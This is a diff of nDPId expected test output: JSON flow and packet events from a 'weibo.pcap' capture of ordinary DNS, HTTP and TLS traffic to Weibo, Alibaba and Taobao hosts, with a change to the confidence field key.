00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1463089073424,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073424,"pkt":"kDVu60UQeJKcD6iOCABFAAA8dN1AAEAGHxvAqAFpXbyG9ovjAFD5+n7QAAAAAKACchAf3wAAAgQFtAQCCAoAQQoNAAAAAAEDAwc="} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1463089073478,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1463089073478,"pkt":"eJKcD6iOkDVu60UQCABFAACdAABAAEARtpXAqAEBwKgBaQA1yPAAiVtu8RCBgAABAAUAAAAAAWcGYWxpY2RuA2NvbQAAAQABwAwABQABAADy0wAXAWcGYWxpY2RuA2NvbQdkYW51b3lpwA7AKgABAAEAAAGzAAQvWUHlwCoAAQABAAABswAEL1lBx8AqAAEAAQAAAbMABC9ZQcbAKgABAAEAAAGzAAQvWUHk"} -00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":306,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073478,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073478,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"g.alicdn.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"47.89.65.229"}} +00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":306,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073478,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073478,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"g.alicdn.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"47.89.65.229"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1463089073479,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073479,"pkt":"kDVu60UQeJKcD6iOCABFAAA8KD5AAEARjrjAqAFpwKgBAcVlADUAKPnf1EwBAAABAAAAAAAABGRhdGEFd2VpYm8DY29tAAABAAE="} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"data.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"data.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1463089073479,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073479,"pkt":"kDVu60UQeJKcD6iOCABFAAA8PQxAAEAGymDAqAFpL1lB5caLAbuG5TcXAAAAAKACchASAQAAAgQFtAQCCAoAQQobAAAAAAEDAwc="} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1463089073488,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1463089073488,"pkt":"eJKcD6iOkDVu60UQCABFAABiAABAAEARttDAqAEBwKgBaQA10NoATp++kZuBgAABAAIAAAAAA2xvZwZtbXN0YXQDY29tAAABAAHADAAFAAEAAAIfAAoDbG9nA2dkc8AQwCwAAQABAAAAIwAEjM2uAQ=="} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073488,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"log.mmstat.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"140.205.174.1"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073488,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"log.mmstat.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"140.205.174.1"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1463089073488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073488,"pkt":"kDVu60UQeJKcD6iOCABFAAA8K\/hAAEAGEeTAqAFpjM2uAbzgAbtP+SHlAAAAAKACchCeNwAAAgQFtAQCCAoAQQodAAAAAAEDAwc="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -148,25 +147,25 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1463089073537,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073537,"pkt":"kDVu60UQeJKcD6iOCABFAAA8abpAAEAG1CHAqAFpjM2uAbzkAbvb32OTAAAAAKACchDQkgAAAgQFtAQCCAoAQQopAAAAAAEDAwc="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1463089073616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073616,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+OyanX1+fp+0aAS\/\/9YyQAAAgQFqAQCCAoDdg1LAEEKDQEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1463089073616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073616,"pkt":"kDVu60UQeJKcD6iOCABFAAA0dN5AAEAGHyLAqAFpXbyG9ovjAFD5+n7Rsmp19oAQAOWGdAAAAQEICgBBCj0Ddg1L"} -00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073424,"flow_last_seen":1463089073616,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1463089073616,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"js.t.sinajs.cn","url":"js.t.sinajs.cn\/t5\/register\/js\/v6\/pl\/base.js?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073424,"flow_last_seen":1463089073616,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1463089073616,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"js.t.sinajs.cn","url":"js.t.sinajs.cn\/t5\/register\/js\/v6\/pl\/base.js?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1463089073635,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073635,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGFnUvWUHlwKgBaQG7xos8arg3huU3GIASOQiHzQAAAgQFqAEBBAIBAwMJ"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1463089073635,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073635,"pkt":"kDVu60UQeJKcD6iOCABFAAAoPQ1AAEAGynPAqAFpL1lB5caLAbuG5TcYPGq4OFAQAOUAuQAA"} -00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073479,"flow_last_seen":1463089073635,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1463089073635,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"g.alicdn.com","ja3":"58e7f64db6e4fe4941dd9691d421196c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} +00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073479,"flow_last_seen":1463089073635,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1463089073635,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"g.alicdn.com","ja3":"58e7f64db6e4fe4941dd9691d421196c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1463089073759,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073759,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGFnUvWUHlwKgBaQG7xo+u1rhnnywRAoASOQgi\/AAAAgQFqAEBBAIBAwMJ"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1463089073759,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073759,"pkt":"kDVu60UQeJKcD6iOCABFAAAoGylAAEAG7FfAqAFpL1lB5caPAbufLBECrta4aFAQAOWb5wAA"} 00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1463089073760,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1463089073760,"pkt":"eJKcD6iOkDVu60UQCABFAACPAABAAEARtqPAqAEBwKgBaQA1xdAAe7w5O9aBgAABAAMAAAAABmFjanN0YgZhbGl5dW4DY29tAAABAAHADAAFAAEAAAJYAAcEYWNqc8ATwC8ABQABAAABAAAhBGFjanMGYWxpeXVuA2NvbQNnZHMKYWxpYmFiYWRuc8AawEIAAQABAAAAbAAEKpy4Ew=="} -01024{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":424,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073760,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"acjstb.aliyun.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"42.156.184.19"}} +01024{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":424,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073760,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"acjstb.aliyun.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"42.156.184.19"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1463089073760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073760,"pkt":"kDVu60UQeJKcD6iOCABFAAA8np1AAEAG913AqAFpKpy4E8wvAbt9EpT8AAAAAKACchBGkwAAAgQFtAQCCAoAQQphAAAAAAEDAwc="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1463089073760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073760,"pkt":"kDVu60UQeJKcD6iOCABFAAA8jjVAAEAGB8bAqAFpKpy4E8wwAbsmFYRUAAAAAKACchCuNwAAAgQFtAQCCAoAQQphAAAAAAEDAwc="} 00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1463089073763,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1463089073763,"pkt":"eJKcD6iOkDVu60UQCABFAACYAABAAEARtprAqAEBwKgBaQA1hB4AhOXUkPeBgAABAAMAAAAABWxvZ2luBnRhb2JhbwNjb20AAAEAAcAMAAUAAQAAASwADAl3YWdicmlkZ2XAEsAuAAUAAQAAAMgAJgl3YWdicmlkZ2UGdGFvYmFvA2NvbQNnZHMKYWxpYmFiYWRuc8AZwEYAAQABAAAALwAEjM2qPw=="} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":429,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073289,"flow_last_seen":1463089073763,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073763,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"login.taobao.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"140.205.170.63"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":429,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073289,"flow_last_seen":1463089073763,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073763,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"login.taobao.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"140.205.170.63"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073764,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1463089073764,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073764,"pkt":"kDVu60UQeJKcD6iOCABFAAA8woBAAEAGfx3AqAFpjM2qP7ppAbuaKMjiAAAAAKACchCy\/gAAAgQFtAQCCAoAQQpiAAAAAAEDAwc="} 